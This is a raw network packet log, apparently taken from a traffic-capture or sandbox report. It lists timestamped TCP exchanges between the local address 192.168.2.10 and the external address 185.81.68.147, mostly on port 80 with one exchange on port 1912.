                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.907975912 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.908320904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.908365011 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.908857107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.909004927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.909044981 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.909708977 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.909781933 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.909818888 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.910578012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.910665035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.910702944 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.911411047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.924931049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.924961090 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.925013065 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.925086975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.925124884 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.925287008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.925348997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.925384998 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.926162004 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.926327944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.926367998 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.927031994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.927148104 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.927190065 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.927922010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.928014040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.928055048 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.928817034 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.928927898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.928970098 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.929697037 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.942812920 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.980912924 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.062586069 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.063541889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.063627005 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.063733101 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.063996077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.064142942 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.064182043 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.064244032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.065042019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.065090895 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.065171957 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.065921068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.065973043 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.065975904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.066792965 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.066847086 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.066942930 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.067675114 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.067687988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.067723036 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.068551064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.068608046 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.068644047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.069443941 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.069457054 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.069566965 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.070324898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.070385933 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.070451021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.071183920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.071249008 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.071317911 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.072035074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.072097063 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.072140932 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.072895050 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.072961092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.072962046 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.073797941 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.073862076 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.073911905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.074692011 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.074753046 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.074786901 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.075630903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.075683117 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.075767994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.076711893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.076786041 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.076853991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.077691078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.077764988 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.077769995 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.078551054 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.078624010 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.078708887 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.079410076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.079469919 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.079503059 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.080133915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.080189943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.080220938 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.080801010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.080873013 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.080913067 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.081690073 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.081762075 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.081849098 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.082587004 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.082633972 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.082640886 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.083517075 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.083591938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.083594084 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.084336042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.084412098 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.084456921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.085207939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.085268021 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.085270882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.086071968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.086127996 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.086184025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.086952925 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.087040901 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.087042093 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.087809086 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.087882996 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.087927103 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.088701010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.088763952 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.088797092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.089562893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.089636087 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.089668036 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.090490103 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.090567112 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.090581894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.091332912 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.091396093 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.091415882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.092232943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.092283964 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.092338085 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.093106985 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.093164921 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.093202114 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.093991995 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.094049931 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.094093084 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.094830990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.094887972 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.094937086 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.095772028 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.095834970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.095839024 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.096592903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.096668005 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.096709967 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.097465038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.097522974 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.097563982 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.098326921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.098390102 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.098437071 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.099186897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.099277973 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.099281073 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.100109100 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.100167990 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.100209951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.100963116 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.101035118 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.101075888 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.101836920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.101900101 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.101973057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.102771997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.102845907 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.102860928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.103559017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.103687048 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.117181063 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.117242098 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.117341042 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.117528915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.117650032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.117743969 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.118407965 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.118532896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.118628979 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.119390965 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.119455099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.119553089 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.120156050 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.120389938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.120492935 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.121018887 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.121124983 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.121225119 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.121907949 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.121984959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.122090101 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.256159067 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.256186962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.256340981 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.256397009 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.256438971 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.256490946 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.257226944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.257344961 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.257446051 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.258140087 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.258214951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.258311033 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.258939981 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.259074926 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.259176016 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.259877920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.260073900 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.260184050 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.260725021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.260811090 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.260910034 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.261635065 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.261746883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.261841059 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.262476921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.262582064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.262672901 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.263350010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.263494015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.263581038 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.264215946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.264326096 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.264417887 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.265119076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.265232086 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.265322924 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.265985966 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.266088963 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.266177893 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.266829014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.266956091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.267076969 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.267710924 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.267764091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.267813921 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.268599033 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.268682003 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.268728018 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.269478083 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.269593000 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.269643068 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.270355940 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.270539045 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.270585060 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.271251917 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.271351099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.271394968 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.272099972 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.272214890 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.272262096 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.272984982 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.273111105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.273159981 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.273859024 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.274017096 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.274121046 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.274741888 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.274871111 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.274965048 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.275652885 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.275805950 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.275904894 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.276521921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.276676893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.276813984 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.277359962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.277473927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.277614117 CET4972380192.168.2.10185.81.68.147
